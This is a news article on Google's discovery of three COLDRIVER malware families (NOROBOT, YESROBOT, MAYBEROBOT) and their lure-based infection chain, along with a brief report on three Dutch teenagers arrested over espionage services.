Google Identifies Three New Russian Malware Families Linked to COLDRIVER Hackers

Google Threat Intelligence Group (GTIG) has uncovered three new malware families developed by the Russian-linked hacking group COLDRIVER, signaling an accelerated “operations tempo” since May 2025.

The malware, named NOROBOT, YESROBOT, and MAYBEROBOT, appears to be a coordinated suite connected through a shared delivery chain, according to GTIG researcher Wesley Shields.

Background on COLDRIVER

• Historically, COLDRIVER targeted NGO personnel, policy advisors, and dissidents to steal credentials.
• The new malware activity marks a shift toward broader infection strategies, using ClickFix-style HTML lures and fake CAPTCHA prompts to execute malicious PowerShell commands via the Windows Run dialog.
• The group’s previous malware, LOSTKEYS, has not been observed in the wild since its public disclosure earlier in 2025.

Malware Families Overview

Infection Chain:

1. Victim interacts with COLDCOPY HTML lure → drops NOROBOT DLL.
2. NOROBOT executes → deploys next-stage malware (YESROBOT or MAYBEROBOT).
3. YESROBOT or MAYBEROBOT connects to hard-coded C2 servers for command execution and data collection.

“NOROBOT and its infection chain have been constantly evolved—initially simplified for deployment success, later reintroducing complexity such as split cryptography keys,” Shields said.

Operational Insights

• YESROBOT was deployed briefly as a temporary solution following public disclosure of LOSTKEYS.
• MAYBEROBOT became the mainstay implant, likely reserved for high-value targets previously compromised via phishing.
• NOROBOT’s earlier versions included full Python 3.8 installation, a noisy artifact likely to attract detection.
• The overall goal: intelligence collection from compromised devices.

Related Legal Developments

In parallel, the Netherlands’ Public Prosecution Service (OM) arrested three 17-year-olds suspected of providing cyber services to a foreign government.

• One suspect reportedly collaborated with a Russian-affiliated hacker group to map Wi-Fi networks in The Hague.
• Two suspects were arrested on September 22, 2025; the third remains under house arrest due to a limited role.

“The information collected was shared with the client for a fee and could be used for digital espionage and cyberattacks,” OM stated.

Key Takeaways

1. COLDRIVER has accelerated malware development, moving from LOSTKEYS to the NOROBOT/YESROBOT/MAYBEROBOT families within days.
2. YESROBOT served as a rapid-response implant, while MAYBEROBOT offers more flexibility and operational stealth.
3. High-value targets remain the primary focus, with constant evolution aimed at evading detection.